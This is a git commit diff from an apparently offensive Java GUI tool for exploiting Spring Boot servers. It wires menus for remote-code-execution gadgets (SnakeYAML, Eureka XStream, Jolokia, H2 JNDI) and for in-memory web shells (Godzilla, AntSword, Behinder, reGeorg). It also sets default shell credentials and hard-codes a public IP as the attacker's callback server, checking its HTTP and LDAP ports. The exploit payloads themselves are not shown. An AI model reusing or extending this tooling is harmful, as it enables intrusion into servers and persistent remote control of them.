LDAPUtil

SummerSec · SummerSec · commit d4d27fada22d · 2021-08-02T12:45:27.000+08:00
diff --git a/.idea/compiler.xml b/.idea/compiler.xml
diff --git a/assembly.xml b/assembly.xml
@@ -21,6 +21,7 @@
             <outputDirectory>/</outputDirectory>
             <includes>
                 <include>**/*.class</include>
+<!--                <include>**/*.fxml</include>-->
             </includes>
             <useDefaultExcludes>true</useDefaultExcludes>
         </fileSet>
diff --git a/pom.xml b/pom.xml
@@ -4,16 +4,16 @@
          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
     <modelVersion>4.0.0</modelVersion>
 
-    <groupId>com.Drops</groupId>
+    <groupId>org.example</groupId>
     <artifactId>SpringBootExploit</artifactId>
-    <packaging>pom</packaging>
+<!--    <packaging>jar</packaging>-->
     <version>1.0-SNAPSHOT</version>
 
 
-    <properties>
-        <maven.compiler.source>8</maven.compiler.source>
-        <maven.compiler.target>8</maven.compiler.target>
-    </properties>
+<!--    <properties>-->
+<!--        <maven.compiler.source>1.8</maven.compiler.source>-->
+<!--        <maven.compiler.target>1.8</maven.compiler.target>-->
+<!--    </properties>-->
 
     <build>
         <plugins>
diff --git a/src/main/java/com/drops/exp/EurekaXstreamRCEEXP.java b/src/main/java/com/drops/exp/EurekaXstreamRCEEXP.java
@@ -12,7 +12,7 @@
  * @Version: v1.0.0
  * @Description:
  **/
-public class EurekaXstreamRCEExp {
+public class EurekaXstreamRCEEXP {
     static String bobyV1 = "eureka.client.serviceUrl.defaultZone=";
     static String bobyV2 = "{\"name\":\"eureka.client.serviceUrl.defaultZone\",\"value\":\"";
 
@@ -59,7 +59,7 @@ public static void main(String[] args) {
         String target = "127.0.0.1:9093";
         String vps = "127.0.0.1:6789";
         String port = "6789";
-        EurekaXstreamRCEExp.setRCEV1(URLUtil.normalizeURL(target),
+        EurekaXstreamRCEEXP.setRCEV1(URLUtil.normalizeURL(target),
                 vps, port);
 
     }
diff --git a/src/main/java/com/drops/main/Main.java b/src/main/java/com/drops/main/Main.java
@@ -14,7 +14,8 @@ public static void main(String[] args) {
 
     @Override
     public void start(Stage primaryStage) throws Exception {
-        Parent root = FXMLLoader.load(getClass().getResource("/gui.fxml"));
+
+        Parent root = FXMLLoader.load(getClass().getResource("/a.fxml"));
         primaryStage.setTitle("Spring Boot Vul Exploit by Drops");
         Scene scene = new Scene(root);
         primaryStage.setScene(scene);
diff --git a/src/main/java/com/drops/poc/EurekaXstreamRCEPOC.java b/src/main/java/com/drops/poc/EurekaXstreamRCEPOC.java
@@ -11,7 +11,7 @@
  * @Version: v1.0.0
  * @Description:
  **/
-public class EurekaXstreamRCE  {
+public class EurekaXstreamRCEPOC {
 
     /**
      * @param target
diff --git a/src/main/java/com/drops/poc/SpringBootEnvInfo.java b/src/main/java/com/drops/poc/SpringBootEnvInfo.java
@@ -1,7 +1,5 @@
 package com.drops.poc;
 
-import com.alibaba.fastjson.JSON;
-import com.alibaba.fastjson.JSONObject;
 import com.drops.utils.HTTPUtils;
 import com.drops.utils.ReUtil;
 
@@ -38,7 +36,7 @@ private static void EnvInfo(String target){
     public static void main(String[] args) {
         String target = "http://127.0.0.1:9093/env";
         SnakeYAMLRCEPOC.hasSnakeYAMLRCE(target);
-        EurekaXstreamRCE.hasEurekaXstreamRCE(target);
+        EurekaXstreamRCEPOC.hasEurekaXstreamRCE(target);
     }
 
 
diff --git a/src/main/java/com/drops/ui/MainController.java b/src/main/java/com/drops/ui/MainController.java
@@ -1,7 +1,14 @@
 package com.drops.ui;
 
 import com.drops.entity.ControllersFactory;
+import com.drops.utils.HTTPUtils;
+import com.drops.utils.LDAPUtil;
+import com.drops.utils.URLUtil;
+import com.drops.utils.Utils;
+import javafx.beans.value.ChangeListener;
+import javafx.beans.value.ObservableValue;
 import javafx.collections.FXCollections;
+import javafx.collections.ObservableList;
 import javafx.event.ActionEvent;
 import javafx.fxml.FXML;
 import javafx.geometry.Insets;
@@ -31,17 +38,112 @@ public class MainController {
     @FXML
     private MenuItem proxySetupBtn;
     public static Map currentProxy = new HashMap();
+    // 设置 目标地址
+    @FXML
+    private TextField targetAddress;
+ // 设置超时
+    @FXML
+    private TextField httpTimeout;
+    @FXML
+    private TextField vps;
+    @FXML
+    private Button crackKeyBtn;
+    @FXML
+    private Button crackSpcKeyBtn;
+    @FXML
+    public ComboBox<String> gadgetOpt;
+    @FXML
+    public ComboBox<String> echoOpt;
+    @FXML
+    private Button crackGadgetBtn;
+    @FXML
+    private Button crackSpcGadgetBtn;
+    @FXML
+    public TextArea logTextArea;
+    @FXML
+    private Label proxyStatusLabel;
+    @FXML
+    private TextField exCommandText;
+    @FXML
+    public TextArea execOutputArea;
+    @FXML
+    private Button executeCmdBtn;
+    @FXML
+    public ComboBox<String> memShellOpt;
+    @FXML
+    private TextField shellPathText;
+    @FXML
+    private TextField shellPassText;
+    @FXML
+    private Button injectShellBtn;
+    @FXML
+    public TextArea InjOutputArea;
+
+    LDAPUtil ldapUtil = null;
 
 
 
     @FXML
     void initialize() {
         this.initToolbar();
-//        this.initComBoBox();
+        this.initComBoBox();
 //        this.initContext();
+        this.initConnect();
+//        this.initAttack();
         ControllersFactory.controllers.put(MainController.class.getSimpleName(), this);
     }
 
+    private void initAttack() {
+       String target =  this.targetAddress.getText();
+       String vps =  this.vps.getText();
+       String timeout =  this.httpTimeout.getText();
+       if (this.connect()){
+
+       }
+
+    }
+
+    private void initConnect() {
+        this.vps.setText("1.116.32.76");
+        this.httpTimeout.setText("5");
+        this.targetAddress.setText("http://127.0.0.1:9092");
+    }
+
+//    private void initContext() {
+//
+//    }
+
+    private void initComBoBox() {
+        ObservableList<String> gadgets = FXCollections.observableArrayList(new String[]{ "SnakeYAMLRCE", "EurekaXstreamRCE", "JolokiaLogbackRCE", "JolokiaRealmRCE", "H2DatabaseConsoleJNDIRCE", "RestartH2DatabaseQueryRCE", "", ""});
+        this.gadgetOpt.setPromptText("SnakeYAMLRCE");
+        this.gadgetOpt.setValue("SnakeYAMLRCE");
+        this.gadgetOpt.setItems(gadgets);
+        ObservableList<String> echoes =FXCollections.observableArrayList(new String[]{"TomcatEcho","SpringEcho"});
+        this.echoOpt.setPromptText("TomcatEcho");
+        this.echoOpt.setValue("TomcatEcho");
+        this.echoOpt.setItems(echoes);
+        this.shellPassText.setText("cat666");
+        this.shellPathText.setText("/catcat66");
+        final ObservableList<String> memShells = FXCollections.observableArrayList(new String[]{"哥斯拉[Filter]", "蚁剑[Filter]", "冰蝎[Filter]", "NeoreGeorg[Filter]", "reGeorg[Filter]", "哥斯拉[Servlet]", "蚁剑[Servlet]", "冰蝎[Servlet]", "NeoreGeorg[Servlet]", "reGeorg[Servlet]"});
+        this.memShellOpt.setPromptText("冰蝎[Filter]");
+        this.memShellOpt.setValue("冰蝎[Filter]");
+        this.memShellOpt.setItems(memShells);
+        this.memShellOpt.getSelectionModel().selectedIndexProperty().addListener(new ChangeListener<Number>() {
+            @Override
+            public void changed(ObservableValue<? extends Number> observableValue, Number number, Number number2) {
+                if (((String)memShells.get(number2.intValue())).contains("reGeorg")) {
+                    MainController.this.shellPassText.setDisable(true);
+                } else {
+                    MainController.this.shellPassText.setDisable(false);
+                }
+
+            }
+        });
+
+
+
+    }
+
     private void initToolbar() {
         this.proxySetupBtn.setOnAction((event) -> {
             Alert inputDialog = new Alert(Alert.AlertType.NONE);
@@ -166,8 +268,36 @@ public void crackSpcGadgetBtn(ActionEvent actionEvent) {
 
     public void crackGadgetBtn(ActionEvent actionEvent) {
     }
+    // 验证服务端是否配置成功
+    public boolean connect() {
+        try {
+            String vps = this.vps.getText();
+            if(!vps.isEmpty()){
+
+                // 判断http 服务是否生效
+                if(HTTPUtils.getRequest(vps + ":3456" ,"isOK.txt").getStatus() == 200){
+                    this.logTextArea.appendText(Utils.log("HTTP Server Is OK!"));
+                    this.logTextArea.appendText(Utils.log("HTTP Server Is Working " + vps + " 的 3456 Port!"));
+                    // 判断 ldap 服务是否生效
+//                    if(ldapUtil.sendLDAPRequest(vps)){
+//                        this.logTextArea.appendText(Utils.log("LDAP Server Is OK!"));
+//                        this.logTextArea.appendText(Utils.log("LDAP Server Is Working " + vps + " 的 1389 Port!"));
+//                        return true;
+//                    }else {
+//                        this.logTextArea.appendText(Utils.log("LDAP Server 绑定 1389 端口失败!"));
+//                        this.logTextArea.appendText(Utils.log("请检查 " + vps + " 的 1389端口是否被占用！"));
+//                    }
+                    return true;
+                }else {
+                    this.logTextArea.appendText(Utils.log("HTTP Server 绑定 3456 端口失败！"));
+                    this.logTextArea.appendText(Utils.log("请检查 " + vps + "的3456端口是否被占用！"));
+                }
+            }
+        }catch (Exception e){
+            this.logTextArea.appendText(Utils.log(e.getMessage()));
+        }
 
-    public void connect(ActionEvent actionEvent) {
+        return false;
     }
 
     public void executeCmdBtn(ActionEvent actionEvent) {
diff --git a/src/main/java/com/drops/utils/HTTPUtils.java b/src/main/java/com/drops/utils/HTTPUtils.java
@@ -47,7 +47,21 @@ public static HttpResponse getRequest(String target){
         String url = URLUtil.normalizeURL(target);
         Proxy proxy = (Proxy) MainController.currentProxy.get("proxy");
         HttpResponse result = null;
-        if (proxy != null){
+        if (proxy == null){
+            result = HttpRequest.get(url).execute();
+        }else {
+            result = HttpRequest.get(url).setProxy(proxy).execute();
+        }
+
+        return result;
+    }
+
+    public static HttpResponse getRequest(String target, String point){
+        String url = URLUtil.normalizeURL(target) + point;
+        Proxy proxy = (Proxy) MainController.currentProxy.get("proxy");
+        HttpResponse result = null;
+        System.out.println(url);
+        if (proxy == null){
             result = HttpRequest.get(url).execute();
         }else {
             result = HttpRequest.get(url).setProxy(proxy).execute();
diff --git a/src/main/java/com/drops/utils/LDAPUtil.java b/src/main/java/com/drops/utils/LDAPUtil.java
@@ -0,0 +1,38 @@
+package com.drops.utils;
+
+import com.drops.ui.MainController;
+
+import java.io.IOException;
+import java.net.Socket;
+
+/**
+ * @ClassName: LDAPUtil
+ * @Description: TODO
+ * @Author: Summer
+ * @Date: 2021/8/2 10:01
+ * @Version: v1.0.0
+ * @Description: 检测1389端口是否被占用
+ **/
+public class LDAPUtil {
+    final MainController mainController;
+
+    public LDAPUtil(MainController mainController) {
+
+        this.mainController = mainController;
+    }
+
+   public boolean sendLDAPRequest(String target) {
+        String host = URLUtil.getHost(target);
+        try {
+            System.out.println("查看 "+ 1389);
+            new Socket(host, 1389);
+//            this.mainController.logTextArea.appendText(Utils.log(host + " 1389 端口被占用! "  ));
+            return false;
+        } catch (IOException e) {
+//            this.mainController.logTextArea.appendText(Utils.log("LDAP Server "));
+            return true;
+        }
+    }
+
+
+}
diff --git a/src/main/java/com/drops/utils/URLUtil.java b/src/main/java/com/drops/utils/URLUtil.java
@@ -38,7 +38,7 @@ public static String normalizeURL(String target){
         if (!target.endsWith("/")){
             target = target + "/";
         }
-        System.out.println("normalizeURL target -> " + target);
+//        System.out.println("normalizeURL target -> " + target);
         return cn.hutool.core.util.URLUtil.normalize(target);
     }
 
@@ -50,7 +50,7 @@ public static String getROOT(String target) {
         String result = null;
         URL url = null;
         try {
-            url = new URL(target);
+            url = new URL(URLUtil.normalizeURL(target));
         } catch (MalformedURLException e) {
             e.printStackTrace();
         }
@@ -60,11 +60,38 @@ public static String getROOT(String target) {
         return result;
     }
 
+    public static String getHost(String target){
+        String result = null;
+        URL url = null;
+        try {
+            url = new URL(URLUtil.normalizeURL(target));
+        } catch (MalformedURLException e) {
+            e.printStackTrace();
+        }
+        result = url.getHost();
+
+//        System.out.println("getROOT result -> " + result);
+        return result;
+    }
+
+    public static int getPort(String target){
+        int result ;
+        URL url = null;
+        try {
+            url = new URL(URLUtil.normalizeURL(target));
+        } catch (MalformedURLException e) {
+            e.printStackTrace();
+        }
+        result = url.getPort();
+        return result;
+    }
+
 
     public static void main(String[] args) {
-        String url = "www.baidu.com";
+        String url = "127.0.0.1";
         String point = "sad";
         System.out.println(URLUtil.normalizeURL(url)+point);
+        System.out.println(URLUtil.getHost(URLUtil.normalizeURL(url)));
     }
 
 
diff --git a/src/main/resources/a.fxml b/src/main/resources/a.fxml
diff --git a/src/test/java/demo.java b/src/test/java/demo.java
